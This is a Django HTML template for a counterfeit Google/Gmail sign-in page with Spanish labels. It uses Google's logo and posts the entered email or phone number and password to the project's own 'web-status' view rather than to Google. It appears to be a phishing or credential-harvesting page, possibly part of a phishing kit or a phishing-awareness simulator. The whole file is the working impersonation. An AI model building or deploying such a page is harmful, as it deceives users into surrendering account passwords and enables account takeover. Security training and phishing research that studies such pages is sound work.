{% load static %}
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Google Fieldset</title>

</head>
<body>
    <link rel="stylesheet" href="{% static 'css/google/log_in.css' %}">
      <div class="maindiv">
        <img src="{% static 'images/google/google.png' %}" alt="Google">
        <h1>Inicio Sesión</h1>
        <h3>Continue to Gmail</h3>

        <form action="{% url 'web-status' intweb=intweb servicio=servicio %}" method="POST">
          {% csrf_token %}
          <div class="inputs">
            <div class="Fields">
              <div class="Fieldset">
                <input type="text" class="Before-FS" required="" autocomplete="off" name="usuario">
                <h1 class="Fs-H"><span>Email o telefono</span></h1>
                <label class="placeholder">Email o telefono</label>
              </div>
            </div>
            <div class="Fields">
              <div class="Fieldset">
                <input type="password" class="Before-FS" required="" name="contraseña" >
                <h1 class="Fs-H"><span>Contraseña</span></h1>
                <label class="placeholder">Contraseña</label>
              </div>
            </div>
            <input type="submit" value="Inicio Sesion">
          </div>
        </form>
      </div>


</body>
</html>